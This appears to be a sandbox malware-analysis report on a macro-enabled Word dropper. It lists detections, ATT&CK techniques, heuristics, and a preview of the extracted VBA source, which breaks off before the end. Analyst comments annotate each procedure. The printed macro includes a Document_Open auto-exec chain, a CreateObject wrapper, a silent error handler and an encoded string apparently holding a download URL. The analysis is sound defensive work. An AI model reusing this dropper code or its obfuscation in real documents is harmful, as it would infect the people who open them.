MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The 'Document_Open' macro, along with 'CreateObject' and 'CallByName' calls, indicates an attempt to execute code upon opening. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' strongly suggests this is a dropper malware. The VBA code is heavily obfuscated, but the presence of these indicators points to a malicious dropper designed to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPEN — Document_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call
-
CallByName call high OLE_VBA_CALLBYNAME — CallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, or documents whose source extraction failed, where the visible macro source is unavailable.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18353 bytes |

SHA-256: a134f23ee10b07b941b8d1f1bce4d644cddcf932374d943a91c1d43e0b99baa3
Preview script — First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header for the ThisDocument module as written out by the olevba export.
' These Attribute lines are exporter metadata, not macro logic; the procedures that
' follow (up to the next Attribute VB_Name line) belong to this module, and its
' Document_Open handler is the auto-exec entry point flagged by OLE_VBA_DOCOPEN.
Private Sub lkswGSHNVuTAQ(ByVal omQZrkiVPngMZw As String, ByVal peoQWzJfdX As Integer)
' Not called from any procedure visible in this preview, and neither parameter is read.
' Every statement here is a call or assignment involving a name that is declared nowhere
' in the visible source (VIfjXBzOOIOwxo, bkgCuZoYdtPvT, UmgYc, ftWCW, ...). This reads as
' filler/decoy code meant to pad the module and dilute the real logic.
' NOTE(review): confirm against the full 18353-byte extract — if these names are never
' defined, the analyst should not spend time tracing this procedure.
VIfjXBzOOIOwxo True, "rLuIztlckEAe", 9044
bkgCuZoYdtPvT "brfqXBb1FG", "xXmt6cN1sdjN"
JGtAgsTnoqG
lCPTKRZExOo = 6741
If UmgYc("CubvvVU1AS", 886, 440) Then
cmmRVObVQe = 9024
ftWCW
drTbEZVgssazF 1883
miEyuzJOiITog = 3192
TYGwFzqKih "du1M2Yb8LO5"
OtEHtGvFpsmxw = "Cb753mIufhHfKj"
Else
eVotAb 653, 5024, 4694
HOoHlL "0EU7OPKnWOQBp", 9258
hxqbWrAyD
JrrWDfLp = False
End If
End Sub
Private Sub EZkcFRxnRjouTl(ByVal MuSLxrZ As Integer)
' Same pattern as lkswGSHNVuTAQ above: no visible caller, the parameter is never read,
' and every callee/variable (cvXQJPIOxxe, DzPrxDwcLEKWX, aBYsyTlLOxb, ...) is undeclared
' in the visible source. Treat as filler unless the full module proves otherwise.
cvXQJPIOxxe "0p3GOHg9GAjBUDK", "lWCFr4ovNAL", "lUxS5dTIL"
EymBSI = 358
iDOTKcGepkOAeE
sCAHDhUqizd = "m2uYSx9r57x6CV"
If DzPrxDwcLEKWX(True, 55, True) Then
mLVGipakLwl = 4069
mWyBxJiVQ 555, "sJ3EJMvxKjvUFs", 2131
uGzOfaOdNBuW = "wXPe1c1QiWNfYg"
aBYsyTlLOxb
Else
wiXEZX
JSzAaGnyj 9355
gNLfZVRnimxxR = "3CSAuj8FKvsfJJ"
End If
End Sub
Private Sub Document_Open()
' Auto-exec entry point: Word runs this handler when the document is opened
' (heuristic OLE_VBA_DOCOPEN). It does nothing itself except hand control to
' module QljCDRAhYYJeK — see VMrLsxqGWZhW further down for the actual stage-one logic.
Dim fUavOXs As Integer    ' declared, never used
Dim ysvMDfdzG As Boolean  ' declared, never used
QljCDRAhYYJeK.VMrLsxqGWZhW
End Sub
Attribute VB_Name = "QljCDRAhYYJeK"
' ---- Module boundary. The procedures below belong to module QljCDRAhYYJeK, the one
' Document_Open dispatches into; its public VMrLsxqGWZhW is the real entry point. ----
Private Sub PbzYzSnrytYs(ByVal QvhDTEOB As String, ByVal iABgsQUWuywQ As String)
' No visible caller; both parameters unused; all three names referenced are undeclared
' in the visible source. Filler, same pattern as the ThisDocument decoys above.
AcYriFBAyXe "a6uOKc4W0jRot2"
nFuWiLofk = "AsOckSqPD99m"
MQlLJrJaJGmdyr "9mOnOm196xOk", "dulLa7Po3jozWL", True
End Sub
Private Sub wpPBaZlNg(ByVal OdhAsRdvKl As Integer, ByVal UdqvvCAKEHp As String)
' No visible caller; parameters unused; callees undeclared in the visible source. Filler.
qKKygiydbcpeHi 3110
FzuUMcZI = 6371
CamHpqofVQJtzq "ZvNzbYqJZJ1yO", "7O9YXtkGHRbC"
faLwgw = True
FxGyLJvXkDuXnm
End Sub
Private Sub CjzNnDnizcfDgX(ByVal fbBDpNgzD As String, ByVal yXbTmGSHZZEzUu As Boolean)
' Three bare calls to names undeclared in the visible source; no visible caller. Filler.
okVkXeIkJG
WspbhijATvOQnh
XoYDn
End Sub
Public Function vtJeRYrx(ByVal uNHgaheI As String, ByVal vpXcp As String) As Object
' Thin wrapper around CreateObject (heuristic OLE_VBA_CREATEOBJ): instantiates whatever
' ProgID the caller supplies in uNHgaheI and passes the reference through UTgowUeRVo,
' which returns it unchanged. vpXcp is accepted but never read.
' No caller of vtJeRYrx is visible in this preview, so the ProgID actually used is not
' known from here — TODO confirm in the full module (the report's CallByName finding is
' also outside the visible lines).
Dim QQACfBvnEL As Integer   ' unused
Dim iYKQhSBvjnh As String   ' unused
Set vtJeRYrx = UTgowUeRVo(CreateObject(uNHgaheI))
End Function
Public Sub VMrLsxqGWZhW()
' Stage-one driver, reached directly from Document_Open.
Dim IAgTLGtVXy As String   ' unused
Dim vOGRlLXd As Integer    ' unused
' The error handler label irqbbTdEaF has no statements behind it: any runtime error in
' the calls below makes the macro exit quietly rather than raise, which keeps failures
' (e.g. a blocked download) invisible to the user.
On Error GoTo irqbbTdEaF
VWPRmiQm.ycjedji        ' module VWPRmiQm is not in this preview — contents unknown
VWPRmiQm.MCubUOGGpxO
KevtNctmqcnMPu          ' local: assembles the decoded-string arguments and calls EoGcJRDhX
Exit Sub
irqbbTdEaF:
End Sub
Private Sub UJtyIdEHGgj(ByVal cynhCXtpuZ As String)
' No visible caller; parameter unused; every referenced name (TTaCzGlAULM, NqrcviW,
' SCSazX, OfGfjkCHRKg, DIgpVqxKez, DVDZuspk) is undeclared in the visible source. Filler.
EyvlKVzYsFu = "MZzFvjMhG"
If TTaCzGlAULM Then
NqrcviW False, "1J7m64CfrsIAs"
SCSazX
OfGfjkCHRKg True
Else
DIgpVqxKez 2123
End If
DVDZuspk "omWl6LySYh", 972
End Sub
Private Function UTgowUeRVo(ByVal tNaSQ As Object) As Object
' Identity pass-through: returns its argument untouched. Its only visible use is in
' vtJeRYrx, where it adds one level of indirection around the CreateObject result —
' presumably to keep "CreateObject" and its consumer apart in a straight-line read.
Dim YBEMFJns As Integer   ' unused
Set UTgowUeRVo = tNaSQ
End Function
Private Sub EoGcJRDhX(ByVal ugUysMpMUOif As String, ByVal LWMEHeWYA As String, ByVal cjiLQGcJHG As String)
' The procedure where the runtime-decoded strings come together: KeWRwAnEnFR and
' ndkhuPNeKaHRXK (local decode wrappers) plus cjiLQGcJHG (EOdsVSPnuYTLt's output, passed
' in by KevtNctmqcnMPu) are handed to objects in modules NPueVrFYLnjLh, JCyeWXOiyKhqyn
' and cagYBeiSN, none of which is in this preview. What those calls do cannot be
' established from here — confirm in the full module before characterising them.
' MUSpHmv is assigned without a Dim (implicit variable); LWMEHeWYA is never read.
Set MUSpHmv = NPueVrFYLnjLh.ppnPuwNle(True, cjiLQGcJHG)
NPueVrFYLnjLh.WnJKbAfDLckP KeWRwAnEnFR, 2670, "8aobfhvxYQM", MUSpHmv
JCyeWXOiyKhqyn.ZfIDrxSj cagYBeiSN.BfgxxHh(ndkhuPNeKaHRXK, MUSpHmv, 8879), False, "VSl6YUeDfo", ugUysMpMUOif
End Sub
Private Sub KevtNctmqcnMPu()
' Called from VMrLsxqGWZhW. Feeds EoGcJRDhX a value from module JCyeWXOiyKhqyn (not in
' this preview), a fixed literal, and the runtime-decoded string from EOdsVSPnuYTLt.
Dim YUqAlGJK As Boolean   ' unused
EoGcJRDhX JCyeWXOiyKhqyn.GKbsdtedofVe, "uNlQmvYTMgvpWz", EOdsVSPnuYTLt
JCyeWXOiyKhqyn.FeZivkODwFK False, 618, JCyeWXOiyKhqyn.GKbsdtedofVe
End Sub
Private Function KeWRwAnEnFR() As String
' Decode wrapper: returns whatever oGDphuZ.GduvfnbzJkCRA produces from two constants.
' The decoder body is not in this preview; the shape (long noisy literal + short literal)
' is consistent with a character-filter or key-based deobfuscation — TODO confirm.
' Detection content should be built on the decoder's verified output, not on a guess.
KeWRwAnEnFR = oGDphuZ.GduvfnbzJkCRA("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function ndkhuPNeKaHRXK() As String
' Decode wrapper, same decoder as KeWRwAnEnFR; its output becomes the first argument to
' cagYBeiSN.BfgxxHh inside EoGcJRDhX. Decoder semantics not visible here — confirm.
ndkhuPNeKaHRXK = oGDphuZ.GduvfnbzJkCRA("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function EOdsVSPnuYTLt() As String
' Decode wrapper whose output KevtNctmqcnMPu passes into EoGcJRDhX. The literal contains
' ":" and "//" fragments and a file-name-like tail, consistent with an obfuscated URL and
' with the report's dropper assessment — the decoder is not visible here, so confirm by
' reproducing it in an isolated analysis environment and record the result as an IoC.
' Note the three schemas.openxmlformats.org URLs the scanner extracted are OOXML
' namespace identifiers from the document body, unrelated to this runtime-built string.
EOdsVSPnuYTLt = oGDphuZ.GduvfnbzJkCRA("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function
Attribute VB_Name = "oGDphuZ"
' ---- Module boundary. Module oGDphuZ is the one referenced by the decode wrappers
' above (oGDphuZ.GduvfnbzJkCRA); that decoder is presumably defined later in this
' module, beyond the truncated preview — verify in the full extract. ----
Private Function OabmIabiHpIOX(ByVal dWXqRYKkmZr As Integer, ByVal tsXIcBJwI As Integer, ByVal LUYteSeZzx As String, ByVal rvPMoqpvdb As String) As String
' Returns rvPMoqpvdb unchanged when kaShcLt.cKVuqwbFwPxEo(...) is False; when it is
' True no assignment is made, so the function falls back to VBA's default empty string.
' dWXqRYKkmZr and tsXIcBJwI are never read. kaShcLt is not in this preview and no caller
' of this function is visible, so its role in the chain is unconfirmed.
If Not kaShcLt.cKVuqwbFwPxEo(rvPMoqpvdb, False, False, LUYteSeZzx) Then
OabmIabiHpIOX = rvPMoqpvdb
End If
End Function
Private Function qCXcVwnCKhP(ByVal wJXruvwcaAXl As String) As String
wbhMqFiLIuXxUH
krKOU = False
lHIEk
qCXcVwnC
... (truncated)
|
|||